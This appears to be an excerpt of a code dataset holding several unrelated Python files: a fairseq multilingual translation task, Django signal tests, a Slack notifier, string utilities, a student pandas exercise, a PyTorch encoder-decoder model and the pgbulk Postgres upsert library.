\"{0:.2f}\".format(size_ratio[id])\n                for id, lang in enumerate(self.gt_langs)\n            }\n        )\n        if split == getattr(self.args, \"train_subset\", \"train\"):\n            resampled_lang_datasets = [\n                ResamplingDataset(\n                    lg_datasets[i],\n                    size_ratio=size_ratio[i],\n                    seed=self.args.seed,\n                    epoch=epoch,\n                    replace=size_ratio[i] >= 1.0,\n                )\n                for i, d in enumerate(lg_datasets)\n            ]\n            dataset = ConcatDataset(\n                resampled_lang_datasets,\n            )\n        else:\n            dataset = ConcatDataset(lg_datasets)\n            lang_splits = [split]\n            for lang_id, lang_dataset in enumerate(lg_datasets):\n                split_name = split + '_' + self.gt_langs[lang_id]\n                lang_splits.append(split_name)\n                self.datasets[split_name] = lang_dataset\n\n            if hasattr(self.args, \"valid_subset\"):\n                if split in self.args.valid_subset:\n                    self.args.valid_subset = self.args.valid_subset.replace(\n                        split, ','.join(lang_splits)\n                    )\n\n        with data_utils.numpy_seed(self.args.seed + epoch):\n            shuffle = np.random.permutation(len(dataset))\n        self.datasets[split] = SortDataset(\n            dataset,\n            sort_order=[\n                shuffle,\n                dataset.sizes,\n            ],\n        ) \n\n    def inference_step(self, generator, models, sample, prefix_tokens=None):\n        with torch.no_grad():\n            bos_token = self.tgt_dict.index('[{}]'.format(self.args.target_lang))\n            return generator.generate(models, sample, prefix_tokens=prefix_tokens, bos_token=bos_token)\n\n    def build_generator(self, models, args):\n        tgt_lang = self.args.target_lang if self.args.common_eos is None else self.args.common_eos\n        if getattr(args, 'score_reference', False):\n            from fairseq.sequence_scorer import SequenceScorer\n            return SequenceScorer(\n                self.target_dictionary,\n                eos=self.tgt_dict.index('[{}]'.format(tgt_lang))\n            )\n        else:\n            from fairseq.sequence_generator import SequenceGenerator\n            return SequenceGenerator(\n                models,\n                self.target_dictionary,\n                beam_size=getattr(args, 'beam', 5),\n                max_len_a=getattr(args, 'max_len_a', 0),\n                max_len_b=getattr(args, 'max_len_b', 200),\n                min_len=getattr(args, 'min_len', 1),\n                normalize_scores=(not getattr(args, 'unnormalized', False)),\n                len_penalty=getattr(args, 'lenpen', 1),\n                unk_penalty=getattr(args, 'unkpen', 0),\n                temperature=getattr(args, 'temperature', 1.),\n                match_source_len=getattr(args, 'match_source_len', False),\n                no_repeat_ngram_size=getattr(args, 'no_repeat_ngram_size', 0),\n                eos=self.tgt_dict.index('[{}]'.format(tgt_lang))\n            )\n\n    def build_dataset_for_inference(self, src_tokens, src_lengths):\n        src_lang = self.args.source_lang if self.args.common_eos is None else self.args.common_eos\n\n        src_lang_id = self.source_dictionary.index('[{}]'.format(src_lang))\n        source_tokens = []\n        for s_t in src_tokens:\n            s_t = torch.cat([s_t, s_t.new(1).fill_(src_lang_id)])\n            source_tokens.append(s_t)\n        dataset = LanguagePairDataset(source_tokens, src_lengths, self.source_dictionary)\n        return dataset\n","sub_path":"generation/fairseq/tasks/multilingual_generation_from_bart.py","file_name":"multilingual_generation_from_bart.py","file_ext":"py","file_size_in_byte":14857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"338055513","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom hello.models import LogEntry, Person\n\n\nclass SignalsTest(TestCase):\n    def test_post_save_signal(self):\n        \"\"\"Tests if signal processor creates db entry when\n        making new request, saving new person and editing it\"\"\"\n        self.assertEquals(len(LogEntry.objects.all()), 0)\n        self.client.get(reverse('hello:home'))\n        self.assertEquals(len(LogEntry.objects.all()), 1)\n\n        person = Person(name='Foo', last_name='Bar')\n        person.save()\n        self.assertEquals(len(LogEntry.objects.all()), 2)\n        person.name = 'Test'\n        person.save()\n        self.assertEquals(len(LogEntry.objects.all()), 3)\n\n    def test_post_delete_signal(self):\n        \"\"\" Tests if signal processor creates db entry when\n        deleting some objects, and checks its action\"\"\"\n        person = Person(name='Foo', last_name='Bar')\n        person.save()\n\n        entry = LogEntry.objects.first()\n        self.assertEqual(entry.action, 'created')\n\n        person.delete()\n        self.assertEquals(len(LogEntry.objects.all()), 2)\n        entry = LogEntry.objects.get(pk=2)\n        self.assertEqual(entry.action, 'delete')\n\n    def test_store_log_entry_when_edited(self):\n        \"\"\"Tests if signal processor stores LogEntry field when\n        LogEntry model instance is edited\"\"\"\n        Person(name='Foo', last_name='Bar').save()\n        self.assertEqual(LogEntry.objects.count(), 1)\n\n        entry = LogEntry.objects.first()\n        entry.action = 'delete'\n        entry.save()\n        self.assertEqual(LogEntry.objects.count(), 2)\n\n        entry = LogEntry.objects.get(model_name='LogEntry')\n        self.assertEqual(entry.action, 'edit')\n","sub_path":"apps/hello/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
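The _get_sample_prob method in the fairseq record above implements temperature-based resampling, with p_i proportional to (n_i / sum(n))^alpha; a numeric check with invented per-language dataset sizes showing how alpha = 0.7 flattens the distribution toward low-resource languages:

import numpy as np

sizes = np.array([1000.0, 100.0, 10.0])
prob = sizes / sizes.sum()
smoothed = prob ** 0.7
smoothed = smoothed / smoothed.sum()
print(prob.round(3))      # [0.901 0.09  0.009]
print(smoothed.round(3))  # roughly [0.807 0.161 0.032]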
color=color)\n self.send()\n\n def send(self):\n logger.info('SlackNotifier - send - building the message ...')\n slack_attachment = dict(pretext='', author_name=self.origin, text=None)\n slack_attachment_field = dict(title=None, value=None, short=False)\n\n field = dict(slack_attachment_field)\n attachment = dict(slack_attachment)\n\n field['title'] = self.field_title\n field['value'] = self.field_value\n\n attachment['fields'] = []\n attachment['fields'].append(field)\n attachment['title'] = self.title\n attachment['title_link'] = self.title_link\n attachment['text'] = '{}'.format(self.content)\n attachment['color'] = self.color\n\n attachments = {\"attachments\": [attachment]}\n\n # send a message\n return self.post_message(attachments)\n","sub_path":"sit/utils/external_notifiers/slack_notifier.py","file_name":"slack_notifier.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"475801504","text":"\"\"\"\r\n Copyright (c) 2016- by Dietmar W Weiss\r\n\r\n This is free software; you can redistribute it and/or modify it\r\n under the terms of the GNU Lesser General Public License as\r\n published by the Free Software Foundation; either version 3.0 of\r\n the License, or (at your option) any later version.\r\n\r\n This software is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\r\n Lesser General Public License for more details.\r\n\r\n You should have received a copy of the GNU Lesser General Public\r\n License along with this software; if not, write to the Free\r\n Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\r\n 02110-1301 USA, or see the FSF site: http://www.fsf.org.\r\n\r\n Version:\r\n\r\n 2018-06-25 DWW\r\n\"\"\"\r\n\r\nimport re\r\n\r\n\r\n\"\"\"\r\n Collection of basic string manipulation functions\r\n\r\n Existing String methods:\r\n s = 'abc dde'\r\n length = len(s) # ==> 7\r\n repetitions = s.count('d') # ==> 2\r\n index = s.index('Dde') # ==> 4\r\n split = s.split('c') # ==> ['ab', ' dde']\r\n reverse = s[::-1] # ==> 'edd cba'\r\n replaced = s.replace('d', 'x') # ==> 'abc xxe'\r\n capitilised = s.capitilize() # ==> 'Abc Dde'\r\n\"\"\"\r\n\r\n\r\ndef startsWithIgnoreCase(string, substring):\r\n \"\"\"\r\n Checks if 'string' starts with 'substring' ignoring case\r\n\r\n Args:\r\n string (string):\r\n full string\r\n\r\n substring (string):\r\n sub string\r\n\r\n Returns:\r\n (bool):\r\n True if 'string' starts with 'substring' ignoring case\r\n \"\"\"\r\n return re.match(substring, string, re.I)\r\n\r\n\r\ndef clean(s):\r\n \"\"\"\r\n Removes space, tab, end of line etc from string\r\n \"\"\"\r\n return re.sub(\"[ \\t\\n\\v\\f\\r]\", \"\", s)\r\n\r\n\r\ndef reverse(s):\r\n \"\"\"\r\n Reverses string\r\n \"\"\"\r\n return s[::-1]\r\n\r\n\r\ndef ensureHexFormat(hexFormat=\"#06x\"):\r\n \"\"\"\r\n Sets format string for hex numbers according to specification of 'format()'\r\n Corrects format if leading '#' or tailing 'x' are missing.\r\n \"\"\"\r\n s = str(hexFormat)\r\n if s.startswith(\"#\") and len(s) > 1:\r\n s = s[1:]\r\n if s.endswith(\"x\") and len(s) > 1:\r\n s = s[:-1]\r\n try:\r\n i = int(s, 16)\r\n except ValueError:\r\n i = 2+4\r\n hexFormat = \"#06x\"\r\n print(\"??? setHexFormat(): invalid hex format:'#\" + s +\r\n \"x', corrected to:'\" + hexFormat + \"'\")\r\n if i < 2+1:\r\n hexFormat = \"#03x\"\r\n print(\"??? 
setHexFormat(): length of hex string:'\" + str(i) +\r\n \"', increased to:'\" + hexFormat + \"'\")\r\n elif i > 2+16:\r\n hexFormat = \"#018x\"\r\n print(\"??? setHexFormat(): length of hex string:'\" + str(i) +\r\n \"', reduced to:'\" + hexFormat + \"'\")\r\n if not hexFormat.startswith(\"#\"):\r\n hexFormat = '#' + hexFormat\r\n if not hexFormat[1] == \"0\":\r\n hexFormat = \"#0\" + hexFormat[1:]\r\n if not hexFormat.endswith('x'):\r\n hexFormat += \"x\"\r\n return hexFormat\r\n\r\n\r\ndef scientificToStandard_if_greater_1(s):\r\n \"\"\"\r\n Converts scientic notation of numbers greater one to standard format\r\n\r\n Note:\r\n for numbers less then one, the string '0' is returned\r\n \"\"\"\r\n try:\r\n int(s)\r\n except:\r\n try:\r\n x = float(s)\r\n if int(x * 10) % 10 == 0:\r\n s = str(int(x))\r\n else:\r\n s = str(x)\r\n except:\r\n pass\r\n return s\r\n\r\n\r\n# Examples ####################################################################\r\n\r\nif __name__ == '__main__':\r\n ALL = 1\r\n\r\n if 0 or ALL:\r\n def f():\r\n s = 'abc dde'\r\n length = len(s) # ==> 7\r\n repetitions = s.count('d') # ==> 2\r\n if 'dde' in s:\r\n index = s.index('dde') # ==> 4\r\n split = s.split('c') # ==> ['ab', ' dde']\r\n rev = s[::-1] # ==> 'edd cba'\r\n replaced = s.replace('d', 'x') # ==> 'abc xxe'\r\n capitilised = ' '.join([x.capitalize() for x in s.split()])\r\n # ==> 'Abc Dde'\r\n for key in sorted(locals()):\r\n print('{:>15}: {}'.format(key, locals()[key]))\r\n f()\r\n\r\n if 0 or ALL:\r\n f = ensureHexFormat(\"#06x \") # \"06\" is total string length\r\n x = 14\r\n s = format(x, f) # returns \"0x000e\"\r\n print('1 x:', x, ' f:', f, ' s:', s)\r\n\r\n f = ensureHexFormat(\"#11x\") # \"06\" is total string length\r\n x = -155\r\n s = format(x, f) # returns \"0x000e\"\r\n print('2 x:', x, ' f:', f, ' s:', s)\r\n print()\r\n\r\n if 0 or ALL:\r\n S = ['1e3', '-.1e2', '1.2.34e3', '1.2.34D3', '1e-20', '1e-3', '1e20']\r\n for s in S:\r\n print('3 s:', s, 'replaced:', scientificToStandard_if_greater_1(s))\r\n print()\r\n\r\n if 0 or ALL:\r\n s = 'abcdef'\r\n print('4 s:', s, ' reverse:', reverse(s))\r\n print()\r\n","sub_path":"coloredlids/tools/string_manip.py","file_name":"string_manip.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"82179374","text":"import pandas as pd\nimport random\n\nworld_pop = pd.read_csv('/Users/mdavis/dev/OMIS30/OMIS30_Winter2019/Class13/world_pop.csv')\nworld_pop_list = []\nfor row in world_pop.values:\n world_pop_list.append(list(row))\n# random.shuffle(world_pop_list)\n\n# print(world_pop_list)\n\n# All imports above here\n# Don't worry about these....\n\n# Loop through continents\n # Subset to that continent only\n # Find the max population in that continent\n # Find the country that matches that population\n\n# print(type(world_pop_list[1]))\n# print(world_pop_list[5])\n\ncontinent_list = set()\nfor country in world_pop_list:\n continent = country[1]\n continent_list.add(continent)\nprint(continent_list)\n# continent_set = set(continent_list)\n# print(continent_set[1])\n\n# Africa\n# Subset\n# print(continent)\n# print(country)\nafrica_countries = []\nfor africa_country in world_pop_list:\n continent = africa_country[1]\n if continent == 'Africa':\n africa_countries.append(africa_country)\n # elif continent == 'Europe':\n # africa_countries.append(africa_country)\n\nprint(africa_countries)\n\n# Loop through africa lists\nprint(len(africa_countries))\n# 
print(continent)","sub_path":"Class13/world_pop.py","file_name":"world_pop.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"524052072","text":"import torch\n\nclass Network(torch.nn.Module):\n def __init__(self):\n super(Network,self).__init__()\n\n def BasicConv(Input,Output):\n return torch.nn.Sequential(\n torch.nn.Conv2d(in_channels=Input,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False),\n torch.nn.Conv2d(in_channels=Output,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False),\n torch.nn.Conv2d(in_channels=Output,out_channels=Output,kernel_size=3,stride=1,padding=1),\n torch.nn.ReLU(inplace=False)\n )\n\n def Upsample(Input,Output):\n return torch.nn.Sequential(\n torch.nn.Upsample(scale_factor=2,mode='bilinear',align_corners=True),\n torch.nn.Conv2d(in_channels=Input, out_channels=Output, kernel_size=3, stride=1, padding=1),\n torch.nn.ReLU(inplace=False)\n )\n\n self.moduleConv1=BasicConv(24,64)\n self.moduleConv2=BasicConv(64,128)\n self.moduleConv3=BasicConv(128,256)\n self.moduleConv4=BasicConv(256,512)\n\n self.moduleDeconv4=BasicConv(512,512)\n self.moduleDeconv3=BasicConv(512,512)\n self.moduleDeconv2=BasicConv(256,256)\n self.moduleDeconv1 = BasicConv(128, 128)\n\n self.Upsample4=Upsample(512,512)\n self.Upsample3=Upsample(512,256)\n self.Upsample2=Upsample(256,128)\n self.Upsample1 = Upsample(128, 24)\n\n #@torchsnooper.snoop()\n def forward(self, input):\n tensorConv1=self.moduleConv1(input)\n tensorConv2=self.moduleConv2(torch.nn.functional.avg_pool2d(input=tensorConv1, kernel_size=2, stride=2, count_include_pad=False))\n tensorConv3=self.moduleConv3(torch.nn.functional.avg_pool2d(input=tensorConv2, kernel_size=2, stride=2, count_include_pad=False))\n #print(tensorConv3.shape)\n tensorConv4 = self.moduleConv4(torch.nn.functional.avg_pool2d(input=tensorConv3, kernel_size=2, stride=2, count_include_pad=False))\n #print(tensorConv4.shape)\n\n tensorDeconv4=self.Upsample4(self.moduleDeconv4(torch.nn.functional.avg_pool2d(input=tensorConv4, kernel_size=2, stride=2, count_include_pad=False)))\n #print(tensorDeconv4.shape)\n tensorDeconv3=self.Upsample3(self.moduleDeconv3(tensorConv4+tensorDeconv4))\n #print(tensorDeconv3.shape)\n a=self.moduleDeconv2(tensorConv3 + tensorDeconv3)\n tensorDeconv2=self.Upsample2(a)\n b=self.moduleDeconv1(tensorConv2 + tensorDeconv2)\n tensorDeconv1=self.Upsample1(b)\n\n return tensorDeconv1\n\n\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"639597622","text":"from collections import namedtuple, UserString\nimport itertools\n\nfrom django.db import connections\nfrom django.db import models\nfrom django.db.models.sql.compiler import SQLCompiler\nfrom django.utils import timezone\nfrom psycopg2.extensions import AsIs\n\n\nclass UpdateField(UserString):\n def __init__(self, field, expression=None):\n self.data = field\n self.expression = expression\n\n\nclass UpsertResult(list):\n \"\"\"\n Returned by the upsert operation.\n\n Wraps a list and provides properties to access created, updated,\n untouched, and deleted elements\n \"\"\"\n\n @property\n def created(self):\n return (i for i in self if i.status_ == \"c\")\n\n @property\n def updated(self):\n return (i for i in self if i.status_ == \"u\")\n\n @property\n def untouched(self):\n 
return (i for i in self if i.status_ == \"n\")\n\n @property\n def deleted(self):\n return (i for i in self if i.status_ == \"d\")\n\n\ndef _quote(field):\n return '\"{0}\"'.format(field)\n\n\ndef _get_update_fields(queryset, to_update, exclude=None):\n \"\"\"\n Get the fields to be updated in an upsert.\n\n Always exclude auto_now_add, auto_created fields, and unique fields in an\n update\n \"\"\"\n exclude = exclude or []\n model = queryset.model\n fields = {\n **{field.attname: field for field in model._meta.fields},\n **{field.name: field for field in model._meta.fields},\n }\n\n if to_update is None:\n to_update = [field.attname for field in model._meta.fields]\n\n to_update = [\n attname\n for attname in to_update\n if (\n attname not in exclude\n and not getattr(fields[attname], \"auto_now_add\", False)\n and not fields[attname].auto_created\n )\n ]\n\n return to_update\n\n\ndef _fill_auto_fields(queryset, values):\n \"\"\"\n Given a list of models, fill in auto_now and auto_now_add fields\n for upserts. Since django manager utils passes Django's ORM, these values\n have to be automatically constructed\n \"\"\"\n model = queryset.model\n auto_field_names = [\n f.attname\n for f in model._meta.fields\n if getattr(f, \"auto_now\", False) or getattr(f, \"auto_now_add\", False)\n ]\n now = timezone.now()\n for value in values:\n for f in auto_field_names:\n setattr(value, f, now)\n\n return values\n\n\ndef _prep_sql_args(queryset, connection, cursor, sql_args):\n compiler = SQLCompiler(query=queryset.query, connection=connection, using=queryset.using)\n\n return [\n AsIs(cursor.mogrify(*sql_arg.as_sql(compiler, connection)).decode(\"utf-8\"))\n if hasattr(sql_arg, \"as_sql\")\n else sql_arg\n for sql_arg in sql_args\n ]\n\n\ndef _get_field_db_val(queryset, field, value, connection):\n if hasattr(value, \"resolve_expression\"): # pragma: no cover\n # Handle cases when the field is of type \"Func\" and other expressions.\n # This is useful for libraries like django-rdkit that can't easily be tested\n return value.resolve_expression(queryset.query, allow_joins=False, for_save=True)\n else:\n return field.get_db_prep_save(value, connection)\n\n\ndef _sort_by_unique_fields(queryset, model_objs, unique_fields):\n \"\"\"\n Sort a list of models by their unique fields.\n\n Sorting models in an upsert greatly reduces the chances of deadlock\n when doing concurrent upserts\n \"\"\"\n model = queryset.model\n connection = connections[queryset.db]\n unique_fields = [field for field in model._meta.fields if field.attname in unique_fields]\n\n def sort_key(model_obj):\n return tuple(\n _get_field_db_val(queryset, field, getattr(model_obj, field.attname), connection)\n for field in unique_fields\n )\n\n return sorted(model_objs, key=sort_key)\n\n\ndef _get_values_for_row(queryset, model_obj, all_fields):\n connection = connections[queryset.db]\n return [\n # Convert field value to db value\n # Use attname here to support fields with custom db_column names\n _get_field_db_val(queryset, field, getattr(model_obj, field.attname), connection)\n for field in all_fields\n ]\n\n\ndef _get_values_for_rows(queryset, model_objs, all_fields):\n connection = connections[queryset.db]\n row_values = []\n sql_args = []\n\n for i, model_obj in enumerate(model_objs):\n sql_args.extend(_get_values_for_row(queryset, model_obj, all_fields))\n if i == 0:\n row_values.append(\n \"({0})\".format(\n \", \".join([\"%s::{0}\".format(f.db_type(connection)) for f in all_fields])\n )\n )\n else:\n 
row_values.append(\"({0})\".format(\", \".join([\"%s\"] * len(all_fields))))\n\n return row_values, sql_args\n\n\ndef _get_return_fields_sql(returning, return_status=False, alias=None):\n if alias:\n return_fields_sql = \", \".join(\n \"{0}.{1}\".format(alias, _quote(field)) for field in returning\n )\n else:\n return_fields_sql = \", \".join(_quote(field) for field in returning)\n\n if return_status:\n return_fields_sql += \", CASE WHEN xmax = 0 THEN 'c' ELSE 'u' END AS status_\"\n\n return return_fields_sql\n\n\ndef _get_upsert_sql(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Generates the postgres specific sql necessary to perform an upsert\n (ON CONFLICT) INSERT INTO table_name (field1, field2)\n VALUES (1, 'two')\n ON CONFLICT (unique_field) DO UPDATE SET field2 = EXCLUDED.field2;\n \"\"\"\n model = queryset.model\n update_expressions = {f: f.expression for f in update_fields if getattr(f, \"expression\", None)}\n\n # Use all fields except pk unless the uniqueness constraint is the pk field\n all_fields = [\n field\n for field in model._meta.fields\n if field.column in unique_fields or not isinstance(field, models.AutoField)\n ]\n\n all_field_names = [field.column for field in all_fields]\n returning = returning if returning is not True else [f.column for f in model._meta.fields]\n all_field_names_sql = \", \".join([_quote(field) for field in all_field_names])\n\n # Convert field names to db column names\n unique_fields = [model._meta.get_field(unique_field) for unique_field in unique_fields]\n update_fields = [model._meta.get_field(update_field) for update_field in update_fields]\n\n row_values, sql_args = _get_values_for_rows(queryset, model_objs, all_fields)\n\n unique_field_names_sql = \", \".join([_quote(field.column) for field in unique_fields])\n update_fields_expressions = {\n field.column: f\"EXCLUDED.{_quote(field.column)}\" for field in update_fields\n }\n if update_expressions:\n connection = connections[queryset.db]\n compiler = SQLCompiler(query=queryset.query, connection=connection, using=queryset.using)\n with connection.cursor() as cursor:\n for field_name, expr in update_expressions.items():\n expr = expr.resolve_expression(queryset.query, allow_joins=False, for_save=True)\n update_fields_expressions[\n model._meta.get_field(field_name).column\n ] = cursor.mogrify(*expr.as_sql(compiler, connection)).decode(\"utf-8\")\n\n update_fields_sql = \", \".join(\n f\"{_quote(field.column)} = {update_fields_expressions[field.column]}\"\n for field in update_fields\n )\n\n return_sql = (\n \"RETURNING \" + _get_return_fields_sql(returning, return_status=True) if returning else \"\"\n )\n ignore_duplicates_sql = \"\"\n if ignore_duplicate_updates:\n ignore_duplicates_sql = (\n \" WHERE ({update_fields_sql}) IS DISTINCT FROM ({excluded_update_fields_sql}) \"\n ).format(\n update_fields_sql=\", \".join(\n \"{0}.{1}\".format(model._meta.db_table, _quote(field.column))\n for field in update_fields\n ),\n excluded_update_fields_sql=\", \".join(update_fields_expressions.values()),\n )\n\n on_conflict = (\n \"DO UPDATE SET {0} {1}\".format(update_fields_sql, ignore_duplicates_sql)\n if update_fields\n else \"DO NOTHING\"\n )\n\n if return_untouched:\n row_values_sql = \", \".join(\n [\"('{0}', {1})\".format(i, row_value[1:-1]) for i, row_value in enumerate(row_values)]\n )\n sql = (\n ' WITH input_rows(\"temp_id_\", {all_field_names_sql}) AS ('\n \" VALUES {row_values_sql}\"\n \" ), 
ins AS ( \"\n \" INSERT INTO {table_name} ({all_field_names_sql})\"\n \" SELECT {all_field_names_sql} FROM input_rows ORDER BY temp_id_\"\n \" ON CONFLICT ({unique_field_names_sql}) {on_conflict} {return_sql}\"\n \" )\"\n \" SELECT DISTINCT ON ({table_pk_name}) * FROM (\"\n \" SELECT status_, {return_fields_sql}\"\n \" FROM ins\"\n \" UNION ALL\"\n \" SELECT 'n' AS status_, {aliased_return_fields_sql}\"\n \" FROM input_rows\"\n \" JOIN {table_name} c USING ({unique_field_names_sql})\"\n \" ) as results\"\n \" ORDER BY results.\\\"{table_pk_name}\\\", CASE WHEN(status_ = 'n') THEN 1 ELSE 0 END;\"\n ).format(\n all_field_names_sql=all_field_names_sql,\n row_values_sql=row_values_sql,\n table_name=model._meta.db_table,\n unique_field_names_sql=unique_field_names_sql,\n on_conflict=on_conflict,\n return_sql=return_sql,\n table_pk_name=model._meta.pk.name,\n return_fields_sql=_get_return_fields_sql(returning),\n aliased_return_fields_sql=_get_return_fields_sql(returning, alias=\"c\"),\n )\n else:\n row_values_sql = \", \".join(row_values)\n sql = (\n \" INSERT INTO {table_name} ({all_field_names_sql})\"\n \" VALUES {row_values_sql}\"\n \" ON CONFLICT ({unique_field_names_sql}) {on_conflict} {return_sql}\"\n ).format(\n table_name=model._meta.db_table,\n all_field_names_sql=all_field_names_sql,\n row_values_sql=row_values_sql,\n unique_field_names_sql=unique_field_names_sql,\n on_conflict=on_conflict,\n return_sql=return_sql,\n )\n\n return sql, sql_args\n\n\ndef _fetch(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n sync,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perfom the upsert and do an optional sync operation\n \"\"\"\n model = queryset.model\n connection = connections[queryset.db]\n if (return_untouched or sync) and returning is not True:\n returning = set(returning) if returning else set()\n returning.add(model._meta.pk.name)\n upserted = []\n deleted = []\n # We must return untouched rows when doing a sync operation\n return_untouched = True if sync else return_untouched\n\n if model_objs:\n sql, sql_args = _get_upsert_sql(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n )\n\n with connection.cursor() as cursor:\n sql_args = _prep_sql_args(queryset, connection, cursor, sql_args)\n cursor.execute(sql, sql_args)\n if cursor.description:\n nt_result = namedtuple(\"Result\", [col[0] for col in cursor.description])\n upserted = [nt_result(*row) for row in cursor.fetchall()]\n\n pk_field = model._meta.pk.name\n if sync:\n orig_ids = queryset.values_list(pk_field, flat=True)\n deleted = set(orig_ids) - {getattr(r, pk_field) for r in upserted}\n model.objects.filter(pk__in=deleted).delete()\n\n nt_deleted_result = namedtuple(\"DeletedResult\", [model._meta.pk.name, \"status_\"])\n return UpsertResult(\n upserted + [nt_deleted_result(**{pk_field: d, \"status_\": \"d\"}) for d in deleted]\n )\n\n\ndef _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n sync=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk upsert on a table, optionally syncing the results.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to sync\n model_objs (List[Model]): A list of Django models to sync. 
All models\n in this list will be bulk upserted and any models not in the table\n (or queryset) will be deleted if sync=True.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated. If you want to\n perform an expression such as an ``F`` object on a field when\n it is updated, use the ``pgbulk.UpdateField`` class. See\n examples below.\n returning (bool|List[str]): If True, returns all fields. If a list,\n only returns fields in the list\n sync (bool, default=False): Perform a sync operation on the queryset\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if all columns are identical to the row in the database.\n return_untouched (bool, default=False): When\n ``ignore_duplicate_updates`` is ``True``, untouched rows will not\n be returned in upsert results. Set this to ``True`` to return\n untouched rows.\n \"\"\"\n queryset = queryset if isinstance(queryset, models.QuerySet) else queryset.objects.all()\n\n # Populate automatically generated fields in the rows like date times\n _fill_auto_fields(queryset, model_objs)\n\n # Sort the rows to reduce the chances of deadlock during concurrent upserts\n model_objs = _sort_by_unique_fields(queryset, model_objs, unique_fields)\n update_fields = _get_update_fields(queryset, update_fields, exclude=unique_fields)\n\n return _fetch(\n queryset,\n model_objs,\n unique_fields,\n update_fields,\n returning,\n sync,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n )\n\n\ndef update(queryset, model_objs, update_fields=None):\n \"\"\"\n Bulk updates a list of model objects that are already saved.\n\n Args:\n queryset (QuerySet): The queryset to use when bulk updating\n model_objs (List[Model]): Model object values to use for the update\n update_fields (List[str], default=None): A list of fields on the\n model objects to update. If ``None``, all fields will be updated.\n\n Example:\n Update an attribute of multiple models in bulk::\n\n import pgbulk\n\n pgbulk.update(\n MyModel,\n [\n MyModel(id=1, some_attr='some_val1'),\n MyModel(id=2, some_attr='some_val2')\n ],\n # These are the fields that will be updated. 
If not provided,\n # all fields will be updated\n ['some_attr']\n )\n \"\"\"\n queryset = queryset if isinstance(queryset, models.QuerySet) else queryset.objects.all()\n connection = connections[queryset.db]\n model = queryset.model\n update_fields = _get_update_fields(queryset, update_fields)\n\n # Add the pk to the value fields so we can join during the update\n value_fields = [model._meta.pk.attname] + update_fields\n\n row_values = [\n [\n _get_field_db_val(\n queryset,\n model_obj._meta.get_field(field),\n getattr(model_obj, model_obj._meta.get_field(field).attname),\n connection,\n )\n for field in value_fields\n ]\n for model_obj in model_objs\n ]\n\n # If we do not have any values or fields to update, just return\n if len(row_values) == 0 or len(update_fields) == 0:\n return []\n\n db_types = [model._meta.get_field(field).db_type(connection) for field in value_fields]\n\n value_fields_sql = \", \".join(\n '\"{field}\"'.format(field=model._meta.get_field(field).column) for field in value_fields\n )\n\n update_fields_sql = \", \".join(\n [\n '\"{field}\" = \"new_values\".\"{field}\"'.format(field=model._meta.get_field(field).column)\n for field in update_fields\n ]\n )\n\n values_sql = \", \".join(\n [\n \"({0})\".format(\n \", \".join(\n [\n \"%s::{0}\".format(db_types[i]) if not row_number and i else \"%s\"\n for i, _ in enumerate(row)\n ]\n )\n )\n for row_number, row in enumerate(row_values)\n ]\n )\n\n update_sql = (\n \"UPDATE {table} \"\n \"SET {update_fields_sql} \"\n \"FROM (VALUES {values_sql}) AS new_values ({value_fields_sql}) \"\n 'WHERE \"{table}\".\"{pk_field}\" = \"new_values\".\"{pk_field}\"'\n ).format(\n table=model._meta.db_table,\n pk_field=model._meta.pk.column,\n update_fields_sql=update_fields_sql,\n values_sql=values_sql,\n value_fields_sql=value_fields_sql,\n )\n\n update_sql_params = list(itertools.chain(*row_values))\n\n with connection.cursor() as cursor:\n update_sql_params = _prep_sql_args(queryset, connection, cursor, update_sql_params)\n return cursor.execute(update_sql, update_sql_params)\n\n\ndef upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk upsert on a table.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to upsert\n model_objs (List[Model]): A list of Django models to upsert. All models\n in this list will be bulk upserted.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated. If you want to\n perform an expression such as an ``F`` object on a field when\n it is updated, use the ``pgbulk.UpdateField`` class. See\n 